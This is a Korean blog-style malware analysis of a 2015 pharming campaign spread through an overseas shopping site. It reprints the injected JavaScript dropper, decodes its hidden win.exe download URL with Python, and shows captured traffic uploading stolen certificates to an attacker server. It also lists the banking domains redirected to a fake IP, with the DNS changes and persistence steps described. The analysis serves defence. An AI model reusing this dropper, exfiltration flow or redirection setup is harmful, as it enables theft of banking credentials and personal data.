해외쇼핑몰 크리겟에서 파밍 유포중

크리겟(해외 쇼핑몰) 사이트에서 파밍이 많이 유포 되는데 정말 많이 말썽이다.

보안에 구멍이 있는 원천적인 근본을 차단해야 하는데 말이다.

정확히는 모르겠지만 게시판에서 파일 업로드 부분에서 삽입된 듯 싶다.

<script language="javascript" src="http://count5.51yes.com/click.aspx?id=51881149&logo=5" charset="gb2312"></script> <script type="text/javascript" src="swfobject.js"></script> <script src="jquery-1.4.2.min.js"></script> <script type="text/javascript"> var winer = navigator.userAgent.toLowerCase(); var apple = deconcept.SWFObjectUtil.getPlayerVersion(); if(document.cookie['indexOf']('a113070')==-1 && winer['indexOf']('b'+'o'+'t')==-1 && winer['indexOf']('sp'+'i'+'der')==-1) {                                                                    var expires=new Date(); expires.setTime(expires.getTime()+6*60*60*1000); document.cookie="a113070=Yes;path=/;expires="+expires.toGMTString();                                                                                                                             var xmPpPuD= { ~생략~ } function ckl(){var bmw=new Array(263,275,275,271,217,206,206,278,278,278,205,275,263,260, 268,256,267,275,256,205,258,270,205,266,273,206,258,263,260,259,264,275,270,273,206,278,264, 269,205,260,279,260,159);return bmw;}function ckls(){return "JB2kHkHkgFPKLKLkkkkkkKwkHB2ByBxBmBlkHBmKwBFBLKwBJkKKLBFB2ByBHBZkHBLkKKLkkBZBwKwByk2Bygg";} </script>

Exploit code중에서도 가장 main에 해당한다. 여기서 사용되는 암호화된 유포지를 찾아 복호화 하는게 우선이다.

>>> bmw = [263,275,275,271,217,206,206,278,278,278,205,275,263,260,268,256,267,2 75,256,205,258,270,205,266,273,206,258,263,260,259,264,275,270,273,206,278,264,2 69,205,260,279,260,159] >>> for i in range(0, len(bmw)): ...     print chr(bmw[i] - 159), ... http://www.themalta.co.kr/ch******/win.exe

파이썬으로 간단하게 복호화 시도

win.exe는 C:\[랜덤6자리]\[랜덤8자리].dll을 생성하여 KoQianNi 함수를 실행한다.

C:\Windows\system32를 CreateProcessA를 이용하여 SUSPEND로 실행한 후에 svchost 프로세스에 악성 data를 써 넣는다.

컴퓨터 부팅시 자동실행을 위해서 레지스트리에 추가 및 수정한다.

GET /fcg-bin/cgi_get_portrait.fcg?uins=274441****?=2892 HTTP/1.1 Accept: */* Accept-Language: ko Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.0.3705) Host: users.qzone.qq.com Connection: Keep-Alive HTTP/1.1 200 OK Server: QZHTTP-2.37.1 Content-Encoding: gzip Cache-Control: max-age=86400 Content-Type: text/html Content-Length: 121 Date: Fri, 17 Apr 2015 15:02:44 GMT Connection: keep-alive Vary: Accept-Encoding ..........+./*)J.,qN..qJL...V2271114.46V..V.()).../..O.7.+../J.+,.K.../...K.G(Gf...(........T22....342.324.J..j..33..|...

users.qzone.qq.com에 접속하여 파밍IP를 받아온다.

GET /ip.php?=11411 HTTP/1.1 Accept: */* Accept-Language: ko Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.0.3705) Host: 23.89.126.211 Connection: Keep-Alive HTTP/1.1 200 OK Date: Fri, 17 Apr 2015 15:02:51 GMT Server: Apache/2.2.4 (Win32) PHP/5.2.3 X-Powered-By: PHP/5.2.3 Content-Length: 32 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Language: ko 8fb122e4699fafdbc4fbed36d3715530POST /upload.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://23.89.126.211/upload.php Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7da3e1bd0314 Content-Length: 295 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: 23.89.126.211 Cache-Control: no-cache -----------------------------7da3e1bd0314 Content-Disposition: form-data; name="upload_file1"; filename="C:\DOCUME~1\users\LOCALS~1\Temp\77a2cc089213880a45c1c69d818fd20e.zip" Content-Type: application/x-zip-compressed PK.................... -----------------------------7da3e1bd0314-- HTTP/1.1 200 OK Date: Fri, 17 Apr 2015 15:02:55 GMT Server: Apache/2.2.4 (Win32) PHP/5.2.3 X-Powered-By: PHP/5.2.3 Content-Length: 0 Content-Type: text/html;charset=utf-8 Content-Language: ko

받아온 후에는 ip를 hash하고 인증서를 zip으로 압축하여 업로드한다. (정보유출지 서버는 AMPSetup을 사용 중.)

기본, 보조 DNS 서버는 127.0.0.1로 수정하여 자신의 컴퓨터를 DNS서버로 이용한다.

최종적으로 금융감독원 팝업이 뜨고 은행을 선택하게되면 KISA 전자금융사기예방서비스로 리다이렉션 된다.

이렇게 이름, 주민등록번호, 계좌번호, 계좌비밀번호, 핸드폰번호 등을 서버에 저장한다.

C:\Documents and Settings\users>nslookup naver.com DNS request timed out.     timeout was 2 seconds. *** Can't find server name for address 127.0.0.1: Timed out *** Default servers are not available Server:  UnKnown Address:  127.0.0.1 Name:    naver.com Address:  23.89.126.211 C:\Documents and Settings\users>

DNS request 결과 naver의 원래 IP인 202.131.30.12, 125.209.222.141, 125.209.222.142, 202.131.30.11와 다르며 다음과 같은 도메인들이 23.89.126.211로 연결됨.

23.89.126.211 nate.com 23.89.126.211 www.daum.net 23.89.126.211 www.naver.com 23.89.126.211 daum.net 23.89.126.211 naver.com 23.89.126.211 hanmail.net 23.89.126.211 nate.com 23.89.126.211 www.kbstar.com.kr 23.89.126.211 www.wooribank.com.kr 23.89.126.211 www.hanabank.com.kr 23.89.126.211 www.epostbank.go.kr.kr 23.89.126.211 www.ibk.co.kr.kr 23.89.126.211 www.keb.co.kr.kr 23.89.126.211 www.shinhan.com.kr 23.89.126.211 www.nonghyup.com.kr 23.89.126.211 www.kfcc.co.kr.kr 23.89.126.211 www.citibank.co.kr.kr 23.89.126.211 www.standardchartered.co.kr.kr 23.89.126.211 www.kdb.co.kr.kr 23.89.126.211 www.busanbank.co.kr.kr 23.89.126.211 www.dgb.co.kr.kr 23.89.126.211 www.kjbank.com.kr 23.89.126.211 www.knbank.com.kr 23.89.126.211 www.myasset.com.kr 23.89.126.211 www.suhyup-bank.com.kr 23.89.126.211 bank.cu.co.kr.kr 23.89.126.211 www.e-jejubank.com.kr 23.89.126.211 www.jbbank.co.kr.kr